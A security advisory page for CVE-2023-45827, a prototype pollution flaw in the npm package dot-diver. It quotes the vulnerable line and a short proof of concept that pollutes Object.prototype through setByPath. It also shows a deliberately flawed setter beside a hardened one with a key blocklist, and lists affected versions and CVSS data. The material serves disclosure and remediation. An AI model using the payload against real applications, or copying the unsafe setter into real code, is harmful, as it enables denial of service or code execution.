CVE-2023-45827
HIGH 7.3 | EPSS 10.2%
Prototype Pollution (PP) vulnerability in setByPath
Description
### Summary

There is a Prototype Pollution (PP) vulnerability in dot-diver. It can lead to RCE.

### Details

```javascript
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
```

In this code, there is no validation for Prototype Pollution.

### PoC

```javascript
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({}, 'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
```

### Impact

It is Prototype Pollution (PP) and it can lead to DoS, RCE, etc.

### Credits

Team: NodeBoB

- 최지혁 (Jihyeok Choi)
- 이동하 (Lee Dong Ha of ZeroPointer Lab)
- 강성현 (kang seonghyeun)
- 박성진 (sungjin park)
- 김찬호 (Chanho Kim)
- 이수영 (Lee Su Young)
- 김민욱 (MinUk Kim)
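The unchecked assignment described under Details, next to one common mitigation, as an added example that is not dot-diver's code or its actual patch. `unsafeSetByPath`, `safeSetByPath`, `BLOCKED_KEYS` and `demo` are hypothetical names, and the setter is a simplified stand-in for the library's path handling.

```javascript
// Added illustration; simplified stand-in, not dot-diver's implementation or patch.
// Path segments that reach Object.prototype or a constructor function.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Flawed: follows inherited properties and assigns the last key unchecked.
function unsafeSetByPath(target, path, value) {
  const keys = path.split('.');
  const lastKey = keys.pop();
  let current = target;
  for (const key of keys) current = current[key];
  current[lastKey] = value;
}

// Hardened: reject dangerous segments, descend only through own properties.
function safeSetByPath(target, path, value) {
  const keys = path.split('.');
  const bad = keys.find((key) => BLOCKED_KEYS.has(key));
  if (bad !== undefined) throw new Error(`Unsafe path segment: ${bad}`);
  const lastKey = keys.pop();
  let current = target;
  for (const key of keys) {
    if (!Object.prototype.hasOwnProperty.call(current, key)) current[key] = {};
    current = current[key];
    if (current === null || typeof current !== 'object') {
      throw new TypeError(`Cannot descend into non-object at "${key}"`);
    }
  }
  current[lastKey] = value;
  return target;
}

// Runs the advisory's PoC path through both setters and reports the outcome.
function demo() {
  const result = {};
  unsafeSetByPath({}, 'constructor.prototype.polluted', 'foo');
  result.afterUnsafe = {}.polluted; // every object now inherits the value
  delete Object.prototype.polluted; // restore a clean prototype
  try {
    safeSetByPath({}, 'constructor.prototype.polluted', 'foo');
    result.rejected = false;
  } catch {
    result.rejected = true;
  }
  result.afterSafe = {}.polluted; // prototype untouched by the hardened setter
  result.normal = safeSetByPath({}, 'user.profile.name', 'alice');
  return result;
}

console.log(demo());
```

The own-property check matters in addition to the blocklist: it keeps the walk from ever stepping onto an inherited object, so a segment missed by the list still cannot reach a shared prototype.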
Affected packages (1)
- npm/@clickbar/dot-diver: from 0, < 1.0.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH 7.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |
References (5)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2023-45827
- PATCH: https://github.com/clickbar/dot-diver
- WEB: https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f
- WEB: https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a
- WEB: https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47